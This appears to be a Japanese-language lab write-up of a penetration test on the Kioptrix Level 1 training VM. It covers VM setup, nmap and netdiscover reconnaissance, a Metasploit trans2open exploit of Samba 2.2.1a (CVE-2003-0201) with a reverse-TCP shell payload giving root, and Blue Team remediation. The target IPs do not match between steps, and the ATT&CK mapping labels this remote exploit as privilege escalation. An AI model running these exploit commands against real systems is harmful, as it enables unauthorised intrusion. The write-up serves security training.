Kioptrix Level 1: フルスペクトラム脆弱性監査とエクスプロイト
🏛️ プロフェッショナル目的
目的は、Kioptrix Level 1環境に対して構造化されたペネトレーションテストを実施し、完全な'root'権限を奪取し、RedチームとBlueチームの両方の運用に適した技術的修復戦略を文書化することでした。
🏗️ 環境の再現(ハードウェアの背景)
最近の仮想化のデフォルト設定では、多くの場合、レガシーな2010年のカーネルで動作しません。このマシンを正常に起動しネットワークに接続するには、以下の特定のアーキテクチャ設定が必要でした。
- OSサブタイプ: Linux / Red Hat (32-bit)。
- ストレージアーキテクチャ: レガシーな.vmdkハードドライブをサポートするためにSATAからIDE Controllerに切り替え。
- ネットワークプロトコル: Kali Linux攻撃マシンとの内部通信を可能にするため、Host-only adapterを使用したPCI FAST-IIIとして設定。
⚔️ 攻撃分析(Red Team パス)
エクスプロイトは、手動での列挙からエクスプロイトまでのライフサイクルに従いました。
1. 発見と偵察
- Netdiscover:
netdiscover -r 192.168.184.4 を使用してターゲットIPを特定。
- Nmap スキャン: SSH (22)、 HTTP (80)、 RPC (111)、 NetBIOS-SSN (139) などのサービスを特定。 Samba 2.2.1aが主要なエントリポイントとしてフラグ付けされました。
2. エクスプロイト(Samba trans2open)
- 脆弱性: CVE-2003-0201 (ヒープオーバーフロー)。
- MITRE ATT&CK Mapping: - Tactic: 特権昇格 (TA0004)
- Technique: 特権昇格のためのエクスプロイト (T1068)
- Metasploit プロトコル:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- 結果: リバースシェルが正常に起動。コマンド
whoami が root を返しました。
🛡️ 防御的修復(Blue Team パス)
エンタープライズ環境を保護するには、以下の 脆弱性管理 (VM) 戦略が必須です。
- パッチプロトコル: Samba を最新のサポートバージョン (Samba 4.x) にアップデート。
call_trans2open 関数の脆弱性は最新のバージョンで効果的に修正されています。
- ネットワーク強化: ホストベースのファイアウォールを導入し、ポート139と445を信頼された内部サブネットのみに制限します。
- VM ロール戦略: この修復は、標準的な業務時間中の脆弱性管理サイクルに該当し、インフラストラクチャの安定性を確保します。
📝 技術的証拠と手動ログ
以下の画像は、ライブでの手動列挙とターミナル実行を記録したものです。
ターゲット発見とアーキテクチャノート


ルートアクセス証明(ターミナルスナップショット)
ルートシェルの証拠